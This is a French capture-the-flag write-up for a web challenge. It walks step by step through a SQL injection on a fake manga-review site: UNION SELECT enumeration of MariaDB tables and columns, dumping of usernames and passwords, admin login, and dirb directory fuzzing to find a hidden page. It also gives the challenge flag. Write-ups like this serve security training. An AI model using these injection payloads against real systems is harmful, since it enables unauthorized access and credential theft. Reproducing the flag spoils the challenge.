# WRITEUP WEB / ORGA MAFIEUSE
## Consignes :

```
Des trafiquants de drogue utilisent un site de façade (site de review manga) pour faire de la revente de stupéfiants, mais nous n’avons pas trouvé les identifiants pour y accéder. 
Votre mission, si vous l’acceptez, est de trouver un moyen d’accéder à leur site de vente via le site de façade.
Des sources ont entendu dire que l’adresse du chef de l’organisation mafieuse (le flag) est présente sur la deuxième page du site.
Vous devez absolument récupérer ce flag pour envoyer leur chef en prison.

http://game1.marshack.fr:42081

> Format du flag : fl@g{...}
```

## Pièce(s)  jointe(s) :

```
Néant
```

## Serveur :
```
game1 http://game1.marshack.fr:42081
```

## Points attribués :

```
40
```

## Hint :

```

```

## Flag :

```
fl@g{El_Fureidis-Santa_Barbara-Californie}
```



##  Étape 1 : Accès au site de vente ##

http:<adresse_ip>:42081

<img src="images/image01.png" alt="image01" style="zoom:67%;" />



Ici l'injection SQL se trouve dans le champ Nom de l' oeuvre du formulaire de recherche. 

En utilisant OR 1=1, on arrive à afficher la liste des œuvres présentes dans la base de données.

```
' OR '1'='1
```

On obtient  : 

|        Manga        |      Auteur       | Note  |                         Commentaire                          |
| :-----------------: | :---------------: | :---: | :----------------------------------------------------------: |
|         GTO         |   Tōru Fujisawa   | 20/20 | Tout simplement magistral, il n'existe rien de mieux sur terre. |
|       Berserk       |   Kentarō Miura   | 19/20 |   Des démons et des grosses épées, que demander de mieux ?   |
|     Dragon Ball     |  Akira Toriyama   | 19/20 |        Les combats c'est trop bien, ça dépote grave.         |
|         SNK         |  Hajime Isayama   | 19/20 | Un scénario TITANESQUE ainsi que des personnages complètement marteau. |
|        Jojo         |  Hirohiko Araki   | 19/20 |       Des combats et de la testostérone comme on aime.       |
|  My Hero Academia   |  Kōhei Horikoshi  | 17/20 |                         C'est bien.                          |
|   Hunter X Hunter   | Yoshihiro Togashi | 18/20 |    C'est bien mais faut se bouger les fesses M. Togashi.     |
|    One Punch Man    |   Yūsuke Murata   | 18/20 |   Un coups t'es mort, voila un scénario aux petit oignons.   |
| Fullmetal Alchemist |  Hiromu Arakawa   | 15/20 |      Tout le monde adore donc je trouve ça cool aussi.       |
|       Kingdom       |   Yasuhisa Hara   | 18/20 | Des gros coups de masse dans le tas et un peu d'histoire ça fait de mal à personne. |



On recherche des identifiants admin dans la base de données. 

Pour cela, il faut d'abord chercher le nombre d'arguments dont la requête a besoin pour s'exécuter.

On va donc utiliser la commande "union select ". La commande UNION de SQL permet de mettre bout à bout les résultats de plusieurs requêtes utilisant elles-mêmes la commande SELECT. On essaye de trouver le nombre de paramètres nécessaires à la requête, ici nous en avons 4, le manga, l’auteur, la note et le commentaire.

```
' union select 1,2,3,4#
```



|   Manga   |    Auteur     | Note  |                         Commentaire                          |
| :-------: | :-----------: | :---: | :----------------------------------------------------------: |
|    GTO    | Tōru Fujisawa | 20/20 | Tout simplement magistral, il n'existe rien de mieux sur terre. |
|  Berserk  | Kentarō Miura | 19/20 |   Des démons et des grosses épées, que demander de mieux ?   |
| (extrait) |               |       |                                                              |
|  Kingdom  | Yasuhisa Hara | 18/20 | Des gros coups de masse dans le tas et un peu d'histoire ça fait de mal à personne. |
|     1     |       2       |   3   |                              4                               |



On recherche ensuite la version utilisée pour SQL. On voit que le serveur est MariaDB. 
On doit donc respecter la syntaxe mariadb pour exécuter les commandes

```
'union select @@version,null, null, null #
```

|           Manga           |    Auteur     | Note  |                         Commentaire                          |
| :-----------------------: | :-----------: | :---: | :----------------------------------------------------------: |
|            GTO            | Tōru Fujisawa | 20/20 | Tout simplement magistral, il n'existe rien de mieux sur terre. |
|          Berserk          | Kentarō Miura | 19/20 |   Des démons et des grosses épées, que demander de mieux ?   |
|         (extrait)         |               |       |                                                              |
|          Kingdom          | Yasuhisa Hara | 18/20 | Des gros coups de masse dans le tas et un peu d'histoire ça fait de mal à personne. |
| 10.5.18-MariaDB-0+deb11u1 |               |       |                                                              |

Maintenant, il nous faut le nom des tables disponible. 

Ici, nous allons utiliser la requête ci-dessous. Elle permet d'afficher les tables présentes dans la base de données ciblée. On voit ici que nous avons livres et users. Celle qui va nous intéresser est users.

```
' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#
```



|   Manga   |    Auteur     | Note  |                         Commentaire                          |
| :-------: | :-----------: | :---: | :----------------------------------------------------------: |
|    GTO    | Tōru Fujisawa | 20/20 | Tout simplement magistral, il n'existe rien de mieux sur terre. |
|  Berserk  | Kentarō Miura | 19/20 |   Des démons et des grosses épées, que demander de mieux ?   |
| (extrait) |               |       |                                                              |
|  Kingdom  | Yasuhisa Hara | 18/20 | Des gros coups de masse dans le tas et un peu d'histoire ça fait de mal à personne. |
|     1     | livres,users  |   3   |                              4                               |



Ensuite, il faut chercher les différentes colonnes présentes dans la table users.

Comme pour avant, nous allons faire pareil que pour les tables, sauf que cette fois nous recherchons les colonnes.

On voit donc les colonnes username et password

```
  ' union select  1,group_concat(column_name),3,4 from information_schema.columns where  table_schema=database()#  
```

| Manga |                       Auteur                        | Note | Commentaire |
| :---: | :-------------------------------------------------: | :--: | :---------: |
|   1   | id,nom,auteur,Note,Commentaire,id,username,password |  3   |      4      |



On affiche ce que nous avons dans ces deux colonnes avec la commande ci-dessous. Elle permet d'afficher la liste des noms d'utilisateurs et des mots de passe renseignés dans la base de données comme on peut le voir.

```
' union select null, username, password, null from users#
```



|   Manga   |     Auteur      |         Note         |                         Commentaire                          |
| :-------: | :-------------: | :------------------: | :----------------------------------------------------------: |
|    GTO    |  Tōru Fujisawa  |        20/20         | Tout simplement magistral, il n'existe rien de mieux sur terre. |
|  Berserk  |  Kentarō Miura  |        19/20         |   Des démons et des grosses épées, que demander de mieux ?   |
| (extrait) |                 |                      |                                                              |
|  Kingdom  |  Yasuhisa Hara  |        18/20         | Des gros coups de masse dans le tas et un peu d'histoire ça fait de mal à personne. |
|           |    LaMulana     |        goFast        |                                                              |
|           | Narcotraficante |   MeGustaLaDrogua    |                                                              |
|           |  administrador  | YoSoyElAdministrador |                                                              |



La dernière ligne du tableau affiche le login et mot de passe de l'administrateur

Il ne nous reste plus qu'à nous connecter avec les identifiants admins trouvés pour arriver à la prochaine étape

```
login: administrador
mdp : YoSoyElAdministrador
```



## Étape 2 : Trouvé l'adresse du chef ##

Aprés s'être authentifié, un lien en haut de la page apparaît.

```
Bienvenue administrador, voici le lien vers le site interdit : Si vous n'etes pas l'administrador, merci de ne pas cliquer svp
```

<img src="images/image02.png" alt="image02" style="zoom:67%;" />

En cliquant sur le lien, on tombe sur la page suivante 

L'objectif ici va être de trouver la page secrète. Nous avons un petit indice sur l’existence de la page.

<img src="images/image03.png" alt="image03" style="zoom:69%;" />



<img src="images/image04.png" alt="image04" style="zoom:64%;" />

Pour la trouver, il va falloir faire du fuzzing sur l’URL.

Pour faire cela j’ai utilisé *dirb*, qui est un outil  permettant de brute force une URL à l’aide d'un dictionnaire afin de trouver des dossiers contenant des informations intéressantes. 

Ici, nous avons trouvé le dossier "images".

```
dirb http://game1.marshack.fr:42081/drogue
```

<img src="images/image05.png" alt="image05" style="zoom: 50%;" />

Une fois cela trouvé, on va dans le dossier images afin de voir ce que cela contient. On y retrouve 2 dossiers : **imgIndex** et **imgUltraSecret**

<img src="images/image06.png" alt="image06" style="zoom:67%;" />

On se doute donc en regardant le nom des fichiers d’image que la page secrète se nomme **ultraSecret.**

On tape donc l'url suivante :

```
http://game1.marshack.fr:42081/drogue/ultraSecret.html
```

et on tombe sur la page suivante 

 Le flag se trouve dans le pied de page au niveau du champ **Adresse pour envoyer vos lettres**

<img src="images/image07.png" alt="image07" style="zoom:53%;" />

<img src="images/image08.png" alt="image08" style="zoom:67%;" />

<img src="images/image09.png" alt="image09" style="zoom:68%;" />



Le flag est :

<img src="images/image10.png" alt="image10" style="zoom:100%;" />

<!-- Review Taz : 20230322 --> 